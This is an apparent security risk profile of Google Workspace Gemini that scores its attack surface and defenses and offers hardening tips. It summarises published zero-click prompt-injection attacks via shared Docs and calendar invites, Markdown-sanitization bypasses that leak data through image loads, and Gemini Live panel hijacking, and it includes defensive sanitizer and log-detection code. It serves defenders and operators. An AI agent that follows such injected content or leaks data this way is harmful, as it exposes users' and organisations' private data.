Google Workspace Gemini Agent Security Risks

[AI Risk Quadrant chart for Google Workspace Gemini (workspace.google.com): Attack Surface (4.96) plotted against Defense Controls (10); quadrants Exposed Giants, Fortified Leaders, Humble Providers and Tight Operators. This agent sits in Tight Operators.]

| Metric | Value | Rating |
|---|---|---|
| AIRQ Score | 3.03 | Critical |
| Attack Surface | 4.96 | Medium |
| Blast Radius | 2.5 | Low |
| Defense Controls | 10 | Low |
About The Agent

Google Workspace Gemini is a cloud-hosted AI copilot embedded across Gmail, Docs, Sheets, Slides, Drive, Calendar, Chat, and Meet that processes user prompts alongside organizational data through Workspace Intelligence. A standalone Gemini app provides cross-app data retrieval while Gemini Spark extends the agent with multi-step task decomposition and background execution in isolated VMs. The key risk surface centers on external data ingestion and output rendering where confirmed indirect prompt injection and Markdown exfiltration bypasses target the input classifier and sanitization layers.

About the AI Risk Quadrant

Tight Operators placement reflects an attack surface elevated by confirmed exploitation penalties on input processing, external data ingestion, and output rendering, combined with a blast radius constrained by user confirmation requirements and the absence of code execution or deployment capabilities. Defense controls include vendor-documented input classifiers, Markdown sanitization, and audit logging, but independent research has bypassed the input guardrails and output sanitization on multiple occasions. Operators inherit a profile where the primary risk is data exposure through injection-to-exfiltration chains rather than host compromise or autonomous action.

1 Key Risks

The most critical security risks an operator inherits when deploying this agent in its documented default configuration. The agent presents elevated input and output risk from confirmed indirect prompt injection and exfiltration bypasses on its default Workspace integration configuration.

Key Input Risks
The agent ingests emails, shared documents, calendar invites, and chat messages authored by external parties where all sources feed the same reasoning context regardless of trust level on the default configuration. Confirmed zero-click indirect prompt injection via shared Google Docs and calendar invite titles grounds this surface [3][4].
Key Execution Risks
The agent executes actions via MCP tool servers for Gmail, Drive, Calendar, Chat, and People enabling agentic tool chaining across Workspace apps. CVE-2026-0628 demonstrated browser extension hijacking of the Gemini Live panel with no documented independent red-team of the MCP boundary [1][6].
Key Action Risks
Workspace Intelligence query responses draw from the full corpus without per-read confirmation, while destructive actions require user approval. The highest-blast-radius scope the agent holds by default is broad OAuth-scoped read access to all emails, documents, and contacts [9].
Key Output Risks
The agent emits formatted text with embedded links in Workspace app outputs where URL sanitization and Safe Browsing integration are documented as default-on. The Buganizer.cc research demonstrated bypass of Markdown sanitization via linkification quirks enabling zero-click data exfiltration to external endpoints [5].
Key Monitoring Risks
The agent generates audit logs in the Admin console with security investigation tool integration, activity rules, and Reporting API access for programmatic SIEM forwarding. Real-time anomaly detection for prompt injection or data exfiltration patterns is not documented as a default capability [11].

2 AIRQ Scores

The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Confirmed exploitation across multiple input and output channels drives the attack surface score while access control boundaries limit blast radius.

AIRQ Metrics

The agent sits in the Tight Operators quadrant where confirmed exploitation elevates the attack surface while access controls constrain blast radius.

Scores derive from per-component evidence evaluation across attack surfaces, blast radius factors, and defense control documentation.

| Metric | Score | Comments |
|---|---|---|
| AIRQ Score | 3.03 | Four confirmed exploitation penalties drive the composite upward while constrained blast radius and present defenses pull it down. |
| Blast Radius | 2.5 / 10 | Constrained by absence of code execution and deployment access with user confirmation for destructive actions. |
| Attack Surface | 4.96 / 10 | Four surfaces carry evidence penalties from confirmed exploitation via CVE and independent security research. |
| Defense Controls | 10 / 15 | Layered defenses documented but input and output guardrails both bypassed in published independent research. |

3 Attack Surface

Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. Four of ten surfaces carry evidence penalties from confirmed indirect prompt injection, tool hijacking, and output exfiltration demonstrated by independent researchers.

Attack Surface Metrics

Scores range from 1 for minimal surfaces to 4 for surfaces with confirmed exploitation evidence and active penalties.

Each surface is scored on architectural exposure plus evidence-based penalties from confirmed agent-specific vulnerabilities.

| Surface | Score | Comments |
|---|---|---|
| User Input | 4 / 4 | Indirect prompt injection via shared documents and calendar invites demonstrated zero-click context hijacking from externally authored content [3][4][12][13]. |
| External Data | 4 / 4 | Workspace Intelligence retrieves emails, documents, and calendar entries from external parties as grounding data without per-source isolation [3][4][9]. |
| Memory | 1 / 4 | Session-scoped conversation history with no persistent cross-session memory or automated learning loop from usage [9]. |
| Reasoning | 2 / 4 | Multi-step reasoning constrained to Workspace context with vendor-documented security thought reinforcement during inference [8]. |
| Planning | 2 / 4 | Gemini Spark introduces multi-step task decomposition with background execution in isolated VMs, though not independently red-teamed [9]. |
| Tool Execution | 3 / 4 | Workspace MCP servers expose 33 tools across five apps enabling agentic chaining, where CVE-2026-0628 demonstrated browser-level panel hijacking [1][6]. |
| Orchestration | 2 / 4 | Gemini Spark extends orchestration with connector-based cross-system integration while the standard side panel operates as a standalone assistant within one user conversation [9]. |
| Inter-Agent | 1 / 4 | No documented pathway for one Gemini instance to invoke or communicate with another instance in any configuration [9]. |
| Output Processing | 3 / 4 | Markdown sanitization bypassed via linkification quirks and open redirects enabling zero-click Workspace data exfiltration through image loads [5][9]. |
| Configuration | 1 / 4 | Admin controls enable or disable Gemini per app and per organizational unit with no auto-loaded project configuration files [9]. |

The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. All three lethal trifecta components are triggered with high confidence, indicating the agent processes untrusted external content, accesses sensitive organizational data, and has demonstrated output channels capable of exfiltrating bytes outside the trust boundary.

Lethal Trifecta · Complete (3 of 3)

Google Workspace Gemini exhibits all three of these conditions in its documented default configuration:

  • Untrusted input — Workspace Intelligence retrieves content from Gmail threads, Drive files, Calendar entries, and Chat rooms including items authored by external parties, where GeminiJack and SafeBreach Targeted Promptware demonstrated zero-click exploitation from untrusted content [2][3][4].
  • Sensitive data — The agent reads Gmail messages, Calendar events, Drive files, Chat history, and contacts via OAuth-scoped Workspace Intelligence access, where GeminiJack demonstrated searching for documents containing confidential salary information and API keys [3].
  • External egress — Markdown rendering, URL generation, and the ability to draft and send emails via Gemini Spark and MCP tools provide channels to transmit bytes outside the trust boundary, where Buganizer.cc demonstrated exfiltration via linkification bypasses [5].

4 Blast Radius

The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. Blast radius is constrained by the absence of code execution and deployment capabilities with user confirmation required for destructive write operations.

Blast Radius Metrics

Scores reflect what damage the agent can cause after compromise, ranging from 0 for no capability to 4 for unrestricted access.

Each factor measures the scope of potential damage from a compromised agent session across execution, data, and autonomy dimensions.

| Factor | Score | Comments |
|---|---|---|
| Code execution | 0 / 4 | No user-accessible code execution environment; Gemini Spark runs agent tasks in vendor-managed isolated VMs without exposing an interpreter to the user [9]. |
| File system access | 1 / 4 | Creates and modifies Google Docs, Sheets, and Slides in Drive but no local file system access under normal operation [9]. |
| Network access | 2 / 4 | Outbound requests through Google infrastructure where crafted output demonstrated data-exfiltrating requests via Markdown image loads [5][14]. |
| Credential access | 2 / 4 | Broad read access to organizational data including documents that may contain embedded secrets, where GeminiJack extracted confidential files [3]. |
| Autonomous action | 1 / 4 | User confirmation required for destructive actions, but Gemini Spark introduces background execution of recurring tasks once initially approved [9]. |
| Deployment access | 0 / 4 | No deployment, publishing, CI/CD, or infrastructure modification capabilities in any documented configuration [9]. |

5 Defense Controls

Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Layered defenses are documented and default-on but the input guardrails and output guardrails have both been bypassed by independent security teams.

Defense Controls Metrics

Confidence ~ indicates vendor documentation exists but independent testing has focused on demonstrating specific bypasses rather than comprehensive architectural audit.

Each component is scored on documented presence and effectiveness where independent research has tested the boundaries.

| Component | Score | Comments |
|---|---|---|
| Input Guardrails | 2 / 3 | ML-based prompt injection classifiers and security thought reinforcement deployed but bypassed by SafeBreach and Noma Security [3][4][8]. |
| Execution Isolation | 2 / 3 | Cloud-hosted multi-tenant with Gemini Spark in isolated VMs behind Agent Gateway enforcing DLP boundaries, operating under FedRAMP High authorization [9][10]. |
| Action Controls | 2 / 3 | User confirmation for destructive actions with admin controls to disable per app and DLP/IRM restricting data access [7][9]. |
| Output Guardrails | 2 / 3 | Markdown sanitization and Safe Browsing URL redaction deployed but Buganizer.cc demonstrated bypass via linkification quirks [5][9]. |
| Monitoring | 2 / 3 | Audit logs in Admin console with security investigation tool, activity rules, BigQuery export, and Reporting API access [11]. |

6 Hardening Tips

Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Hardening focuses on restricting Workspace Intelligence data sources, limiting MCP tool scope, enforcing DLP policies, and forwarding audit logs to SIEM.

Input Guardrails

Input guardrails intercept adversarial content before it reaches the reasoning loop.

  • Policy: Restrict Workspace Intelligence data sources to exclude external-facing channels from Gemini retrieval scope — counters zero-click indirect prompt injection.
  • Configuration: Configure trust rules for Drive sharing to block Gemini access to documents shared from outside the organization — counters GeminiJack shared document injection.
  • Engineering: Deploy secondary content inspection on inbound emails and calendar invites to flag payloads matching prompt injection patterns — counters SafeBreach calendar injection.

Execution Isolation

Execution isolation contains what a compromised agent can do on the host.

  • Policy: Restrict MCP server tool access to a vetted allowlist of connectors rather than enabling all integrations by default — counters broad tool chaining exposure.
  • Configuration: Configure Chrome Enterprise policies to restrict extension installation and block declarativeNetRequest rule modifications — counters CVE-2026-0628 browser extension hijacking.
  • Engineering: Segment Gemini Spark connector access by organizational unit to limit cross-system orchestration scope — counters lateral movement through connectors.

Action Controls

Action controls govern which tools and actions the agent can invoke autonomously.

  • Policy: Configure DLP policies with Information Rights Management to restrict which document types Gemini can read based on sensitivity labels — counters broad OAuth access.
  • Configuration: Disable Gemini Spark background task execution for organizational units handling sensitive data — counters reduced supervision during autonomous recurring tasks.
  • Engineering: Require multi-party approval workflows for Gemini-initiated email sends in high-sensitivity organizational units — counters AI-drafted phishing from compromised context.

Output Guardrails

Output guardrails inspect what the agent sends to other systems and users.

  • Policy: Enable Chrome Enterprise Premium endpoint DLP to inspect and block exfiltration via rendered links and image loads — counters Markdown linkification bypass.
  • Configuration: Configure Workspace DLP rules to detect Gemini responses containing patterns matching internal credential formats — counters data leakage through output channels.
  • Engineering: Restrict Gemini output rendering to plain text in high-sensitivity organizational units by disabling rich formatting — counters output-based exfiltration.
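The output-guardrail tips above amount to one check: before a Markdown response is rendered, every image and link target (including URLs smuggled through a redirector's query string) must resolve to an allowlisted host. The following is an added example of that check, not Google's code or its documented sanitizer; the allowlist, the redirector path and the sample response are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Hosts an assistant response may legitimately embed (constructed allowlist).
ALLOWED_HOSTS = {"docs.google.com", "drive.google.com", "mail.google.com"}

# Markdown image ![alt](url) or link [text](url); group 1 is "!" for images.
MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+\"[^\"]*\")?\)")


def offending_host(url, allowed=ALLOWED_HOSTS):
    """Return the first off-allowlist host reachable through url, else None.

    Besides the URL's own host, every URL-valued query parameter is checked,
    so an allowlisted redirector (an open redirect) cannot launder an
    external destination past the filter.
    """
    candidates = [url]
    for values in parse_qs(urlparse(url).query).values():
        candidates.extend(values)
    for cand in candidates:
        parsed = urlparse(cand)
        host = (parsed.hostname or "").lower()
        if parsed.scheme in ("http", "https") and host not in allowed:
            return host
    return None


def sanitize_markdown(md, allowed=ALLOWED_HOSTS):
    """Remove off-allowlist images and disarm off-allowlist links.

    Images are dropped because a renderer fetches them with no click; links
    are reduced to their visible text so nothing is fetched automatically.
    Returns (sanitized_markdown, findings), findings being (kind, host)
    tuples suitable for forwarding to the SIEM.
    """
    findings = []

    def repl(m):
        bang, text, url = m.group(1), m.group(2), m.group(3)
        bad = offending_host(url, allowed)
        if bad is None:
            return m.group(0)
        findings.append(("image" if bang else "link", bad))
        return "[image removed]" if bang else f"{text} [external link removed]"

    return MD_REF.sub(repl, md), findings


# Constructed sample response: one benign doc link, one image pointing at an
# external collector, and one link through a hypothetical allowlisted redirector.
SAMPLE_RESPONSE = (
    "Summary of the planning doc.\n"
    "![status](https://example-collector.test/i.png?d=doc-excerpt)\n"
    "[Open doc](https://docs.google.com/document/d/abc)\n"
    "[Details](https://docs.google.com/redirect?url=https://collector.test/x)\n"
)
```

Running `sanitize_markdown(SAMPLE_RESPONSE)` keeps the docs.google.com link intact and reports the image and the redirected link as findings.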

Monitoring

Monitoring captures what the agent did and surfaces anomalies for review.

  • Policy: Forward Gemini audit logs to the SIEM and configure correlation rules mapping activity events to known attack patterns — counters gap between logging and detection.
  • Configuration: Configure activity rules in the security investigation tool to alert on anomalous bulk cross-app data retrieval patterns — counters silent data exfiltration.
  • Engineering: Export Gemini interaction logs to BigQuery and run scheduled queries detecting prompt injection indicators in responses — counters absence of real-time detection.
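The monitoring tips above describe a correlation rule that the vendor logs do not provide by default: one actor's assistant-driven reads fanning out across several Workspace apps in a short window. The following is an added example of that rule run over exported audit events, not Google's code or the real log schema; the field names (ts, actor, app, event), the thresholds and the sample events are constructed assumptions that must be mapped onto the actual export.

```python
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # sliding window per actor
MIN_APPS = 3                    # distinct Workspace apps read in the window
MIN_ITEMS = 20                  # items retrieved in the window


def detect_bulk_retrieval(lines, window=WINDOW, min_apps=MIN_APPS, min_items=MIN_ITEMS):
    """Alert once per actor whose assistant-driven reads fan out across apps.

    lines are JSON objects (one per line, time-ordered) with the assumed
    fields ts, actor, app, event; only event == "data_retrieval" counts.
    """
    recent = defaultdict(deque)   # actor -> deque of (timestamp, app)
    alerted, alerts = set(), []
    for line in lines:
        ev = json.loads(line)
        if ev.get("event") != "data_retrieval":
            continue
        ts, actor = datetime.fromisoformat(ev["ts"]), ev["actor"]
        q = recent[actor]
        q.append((ts, ev["app"]))
        while ts - q[0][0] > window:       # expire events outside the window
            q.popleft()
        apps = {app for _, app in q}
        if len(apps) >= min_apps and len(q) >= min_items and actor not in alerted:
            alerted.add(actor)
            alerts.append({"actor": actor, "apps": sorted(apps),
                           "items": len(q), "at": ev["ts"]})
    return alerts


def _ev(minute, actor, app, event="data_retrieval"):
    """Build one constructed audit event at 09:<minute> on a fixed day."""
    return json.dumps({"ts": f"2025-01-15T09:{minute:02d}:00", "actor": actor,
                       "app": app, "event": event})


APPS = ["gmail", "drive", "calendar", "contacts"]
# Constructed sample: alice reads a few items over half an hour (normal);
# bob's session pulls 24 items from four apps within three minutes.
SAMPLE_LOG = [
    _ev(0, "alice@example.test", "drive"),
    _ev(1, "alice@example.test", "drive"),
    _ev(5, "alice@example.test", "gmail", event="prompt"),  # not a retrieval
    _ev(30, "alice@example.test", "gmail"),
] + [_ev(10 + i // 10, "bob@example.test", APPS[i % 4]) for i in range(24)]

if __name__ == "__main__":
    for alert in detect_bulk_retrieval(SAMPLE_LOG):
        print(alert)
```

The alert fires on bob's twentieth read (at 09:11) and never for alice, whose reads fall out of the window before any threshold is met.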

7 References

The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.

Selected Vulnerabilities

  1. CVE-2026-0628. High-severity Chrome Gemini Live panel hijacking via malicious extensions enabling local file access and camera capture without user consent. Patched in Chrome 143.
  2. OECD AI Incident 2024-09-26-e873. Documented AI incident cataloging indirect prompt injection exposure in Google Gemini for Workspace that could manipulate outputs and facilitate phishing attacks.

Selected Research

  3. GeminiJack — Hacking Google Gemini Enterprise. Noma Security demonstrated zero-click indirect prompt injection in Gemini Enterprise allowing exfiltration of Gmail, Calendar and Drive data through shared documents without user interaction.
  4. Invitation Is All You Need — Hacking Gemini. SafeBreach demonstrated Targeted Promptware attacks via Google Calendar invites that hijack Gemini agents to geolocate users and exfiltrate emails. Presented at Black Hat 2025 and DEF CON 33.
  5. Hacking Gemini — A Multi-Layered Approach. Security researcher bypassed Gemini Markdown sanitization via linkification quirks and open redirects to exfiltrate Workspace data through automatic image loads. Rewarded via Google AI VRP.
  6. Taming Agentic Browsers — Gemini Live in Chrome Hijacking. Palo Alto Unit42 disclosed CVE-2026-0628, showing ordinary Chrome extensions could hijack the Gemini Live panel to access files and camera without user consent.

Vendor Documentation

  7. Indirect Prompt Injections and Layered Defense Strategy for Gemini. Google documents multi-layer defense against indirect prompt injection including content classifiers, Markdown sanitization and a user confirmation framework.
  8. Mitigating Prompt Injection Attacks with a Layered Defense Strategy. Google Security Blog details Gemini 2.5 model hardening and proprietary ML classifiers for malicious prompt detection and Safe Browsing URL redaction across Workspace.
  9. Enterprise Security Controls for Gemini in Google Workspace. Google Workspace Blog documents admin-configurable controls including DLP with IRM, trust rules for Drive sharing and endpoint DLP via Chrome Enterprise Premium.
  10. Gemini in Workspace Achieves FedRAMP High Authorization. Google confirms FedRAMP High, SOC 1/2/3, ISO 27001/27017/27018 and ISO 42001 certifications for Gemini in Workspace apps.
  11. Gemini for Workspace Log Events. Google documents audit logging for Gemini usage including security investigation tool integration and Reporting API access for programmatic monitoring.

Other Sources

  12. Google Patches Gemini Enterprise Vulnerability Exposing Corporate Data. SecurityWeek reports on the GeminiJack vulnerability disclosure by Noma Security and confirms Google patched the architectural weakness in Gemini Enterprise.
  13. Prompt Injection Vulnerability Found in Google Gemini Apps. The Register covers the SafeBreach disclosure at Black Hat documenting indirect prompt injection via Google Calendar invites achieving email exfiltration through Gemini.
  14. BreachWatch — Hacking Gemini Prompt Injection in Google Workspace. Perimeter.net analyzes the bugSWAT Tokyo Markdown exfiltration chain that bypassed Gemini sanitization layers using Google Colab as a bridge.